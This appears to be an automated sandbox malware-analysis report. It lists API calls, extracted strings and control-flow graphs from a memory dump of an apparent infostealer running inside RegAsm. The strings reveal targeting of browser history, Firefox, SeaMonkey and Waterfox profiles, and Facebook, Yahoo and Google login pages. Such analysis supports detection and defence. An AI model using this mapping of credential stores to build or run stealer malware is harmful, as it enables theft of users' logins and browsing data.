                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                                                              • String ID: bhv
                                                                                                                                              • API String ID: 4234240956-2689659898
                                                                                                                                              • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                                              • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                                                                              • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                                              • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 562 4466f4-44670e call 446904 GetModuleHandleA 565 446710-44671b 562->565 566 44672f-446732 562->566 565->566 567 44671d-446726 565->567 568 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 566->568 570 446747-44674b 567->570 571 446728-44672d 567->571 575 4467ac-4467b7 __setusermatherr 568->575 576 4467b8-44680e call 4468f0 _initterm GetEnvironmentStringsW _initterm 568->576 570->566 574 44674d-44674f 570->574 571->566 573 446734-44673b 571->573 573->566 577 44673d-446745 573->577 578 446755-446758 574->578 575->576 581 446810-446819 576->581 582 44681e-446825 576->582 577->578 578->568 583 4468d8-4468dd call 44693d 581->583 584 446827-446832 582->584 585 44686c-446870 582->585 588 446834-446838 584->588 589 44683a-44683e 584->589 586 446845-44684b 585->586 587 446872-446877 585->587 593 446853-446864 GetStartupInfoW 586->593 594 44684d-446851 586->594 587->585 588->584 588->589 589->586 591 446840-446842 589->591 591->586 595 446866-44686a 593->595 596 446879-44687b 593->596 594->591 594->593 597 44687c-446894 GetModuleHandleA call 41276d 595->597 596->597 600 446896-446897 exit 597->600 601 44689d-4468d6 _cexit 597->601 600->601 601->583
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleA.KERNEL32(00000000,0044E4C0,00000070), ref: 00446703
                                                                                                                                              • __set_app_type.MSVCRT ref: 00446762
                                                                                                                                              • __p__fmode.MSVCRT ref: 00446777
                                                                                                                                              • __p__commode.MSVCRT ref: 00446785
                                                                                                                                              • __setusermatherr.MSVCRT ref: 004467B1
                                                                                                                                              • _initterm.MSVCRT ref: 004467C7
                                                                                                                                              • GetEnvironmentStringsW.KERNEL32(?,?,?,?,0044E494,0044E498), ref: 004467EA
                                                                                                                                              • _initterm.MSVCRT ref: 004467FD
                                                                                                                                              • GetStartupInfoW.KERNEL32(?), ref: 0044685A
                                                                                                                                              • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00446880
                                                                                                                                              • exit.MSVCRT ref: 00446897
                                                                                                                                              • _cexit.MSVCRT ref: 0044689D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: HandleModule_initterm$EnvironmentInfoStartupStrings__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2791496988-0
                                                                                                                                              • Opcode ID: ac973ed8bce866ca224172ea4b7a237c44716a7d542afe8b7082d44fa5742df9
                                                                                                                                              • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                                                                                              • Opcode Fuzzy Hash: ac973ed8bce866ca224172ea4b7a237c44716a7d542afe8b7082d44fa5742df9
                                                                                                                                              • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 0040C298
                                                                                                                                                • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                                                                • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                              • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                              • wcschr.MSVCRT ref: 0040C324
                                                                                                                                              • wcschr.MSVCRT ref: 0040C344
                                                                                                                                              • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                              • GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                              • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                                                              • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                                                                                                              • String ID: visited:
                                                                                                                                              • API String ID: 2470578098-1702587658
                                                                                                                                              • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                              • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                                                              • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                              • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 628 40e175-40e1a1 call 40695d call 406b90 633 40e1a7-40e1e5 memset 628->633 634 40e299-40e2a8 call 4069a3 628->634 636 40e1e8-40e1fa call 406e8f 633->636 640 40e270-40e27d call 406b53 636->640 641 40e1fc-40e219 call 40dd50 * 2 636->641 640->636 647 40e283-40e286 640->647 641->640 652 40e21b-40e21d 641->652 648 40e291-40e294 call 40aa04 647->648 649 40e288-40e290 free 647->649 648->634 649->648 652->640 653 40e21f-40e235 call 40742e 652->653 653->640 656 40e237-40e242 call 40aae3 653->656 656->640 659 40e244-40e26b _snwprintf call 40a8d0 656->659 659->640
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                              • memset.MSVCRT ref: 0040E1BD
                                                                                                                                                • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                              • free.MSVCRT ref: 0040E28B
                                                                                                                                                • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                                                                • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                                                              • _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                                                              • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                                                              • API String ID: 2804212203-2982631422
                                                                                                                                              • Opcode ID: 366cc36c026cd150a239da38b4c6b1e2e10dbbf4b03b5b4663773bd365af82a7
                                                                                                                                              • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                                                                              • Opcode Fuzzy Hash: 366cc36c026cd150a239da38b4c6b1e2e10dbbf4b03b5b4663773bd365af82a7
                                                                                                                                              • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                • Part of subcall function 0040CC26: CloseHandle.KERNEL32(?), ref: 0040CC98
                                                                                                                                                • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                              • memset.MSVCRT ref: 0040BC75
                                                                                                                                              • memset.MSVCRT ref: 0040BC8C
                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                                                                              • memcmp.MSVCRT ref: 0040BCD6
                                                                                                                                              • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                                                                                              • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 115830560-3916222277
                                                                                                                                              • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                                              • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                                                                              • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                                              • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                                                              • String ID: r!A
                                                                                                                                              • API String ID: 2791114272-628097481
                                                                                                                                              • Opcode ID: e760b227a922d4e3f094a9eb3eb7a7fe7130a7247a75f8eef54ce2a40c46c596
                                                                                                                                              • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                                                                              • Opcode Fuzzy Hash: e760b227a922d4e3f094a9eb3eb7a7fe7130a7247a75f8eef54ce2a40c46c596
                                                                                                                                              • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                                                • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                                                • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                                                • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                                                                • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                                                                • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                                                                • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                                                                • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                                                                • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                              • _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                                                                • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                                                              • wcslen.MSVCRT ref: 0040C82C
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                                                              • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                                                              • API String ID: 2936932814-4196376884
                                                                                                                                              • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                              • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                                                                              • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                              • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 00403CBF
                                                                                                                                              • memset.MSVCRT ref: 00403CD4
                                                                                                                                              • memset.MSVCRT ref: 00403CE9
                                                                                                                                              • memset.MSVCRT ref: 00403CFE
                                                                                                                                              • memset.MSVCRT ref: 00403D13
                                                                                                                                                • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                              • memset.MSVCRT ref: 00403DDA
                                                                                                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                              • String ID: Waterfox$Waterfox\Profiles
                                                                                                                                              • API String ID: 4039892925-11920434
                                                                                                                                              • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                                              • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                                                                              • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                                              • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 00403E50
                                                                                                                                              • memset.MSVCRT ref: 00403E65
                                                                                                                                              • memset.MSVCRT ref: 00403E7A
                                                                                                                                              • memset.MSVCRT ref: 00403E8F
                                                                                                                                              • memset.MSVCRT ref: 00403EA4
                                                                                                                                                • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                              • memset.MSVCRT ref: 00403F6B
                                                                                                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                              • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                                                              • API String ID: 4039892925-2068335096
                                                                                                                                              • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                                              • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                                                                              • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                                              • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 00403FE1
                                                                                                                                              • memset.MSVCRT ref: 00403FF6
                                                                                                                                              • memset.MSVCRT ref: 0040400B
                                                                                                                                              • memset.MSVCRT ref: 00404020
                                                                                                                                              • memset.MSVCRT ref: 00404035
                                                                                                                                                • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                              • memset.MSVCRT ref: 004040FC
                                                                                                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                              • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                                                              • API String ID: 4039892925-3369679110
                                                                                                                                              • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                                              • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                                                                              • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                                              • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                                                                              APIs
                                                                                                                                              • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memcpy
                                                                                                                                              • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                                                              • API String ID: 3510742995-2641926074
                                                                                                                                              • Opcode ID: 94510af7901ecd36673df76512f8cc8f4b4749faf5a93beda853377b65ea3140
                                                                                                                                              • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                                                                              • Opcode Fuzzy Hash: 94510af7901ecd36673df76512f8cc8f4b4749faf5a93beda853377b65ea3140
                                                                                                                                              • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                                                                              APIs
                                                                                                                                              • CreateFileW.KERNEL32(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                                                              • GetLastError.KERNEL32 ref: 0041847E
                                                                                                                                              • free.MSVCRT ref: 0041848B
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateErrorFileLastfree
                                                                                                                                              • String ID: |A
                                                                                                                                              • API String ID: 981974120-1717621600
                                                                                                                                              • Opcode ID: b6fac9d43bc75127802d1a393ff5c3575377eb3b1acc0c55043375108e40dc75
                                                                                                                                              • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                                                                              • Opcode Fuzzy Hash: b6fac9d43bc75127802d1a393ff5c3575377eb3b1acc0c55043375108e40dc75
                                                                                                                                              • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                                                                • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                              • memset.MSVCRT ref: 004033B7
                                                                                                                                              • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                                                                              • wcscmp.MSVCRT ref: 004033FC
                                                                                                                                              • _wcsicmp.MSVCRT ref: 00403439
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                                                                              • String ID: $0.@
                                                                                                                                              • API String ID: 2758756878-1896041820
                                                                                                                                              • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                                              • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                                                                              • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                                              • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 00403C09
                                                                                                                                              • memset.MSVCRT ref: 00403C1E
                                                                                                                                                • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                                                                • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                                                              • wcscat.MSVCRT ref: 00403C47
                                                                                                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
